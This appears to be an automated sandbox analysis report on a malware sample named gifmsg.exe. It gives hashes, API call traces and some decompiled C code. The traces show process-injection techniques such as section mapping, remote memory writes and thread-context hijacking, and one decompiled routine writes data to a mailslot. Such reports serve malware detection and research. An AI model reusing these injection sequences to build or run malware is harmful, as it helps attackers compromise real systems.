API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: gifmsg.exe Analysis ID: 60136

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	5BDD37EDD3740A4E2DA2E05ABDC20A20
Total matches:	34
Initial Analysis Report:	Open
Initial sample Analysis ID:	60136
Initial sample SHA 256:	3D61067831E54523401557F16F776796142F313F41B2B12D48B017A7E06B48DD
Initial sample name:	gifmsg.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
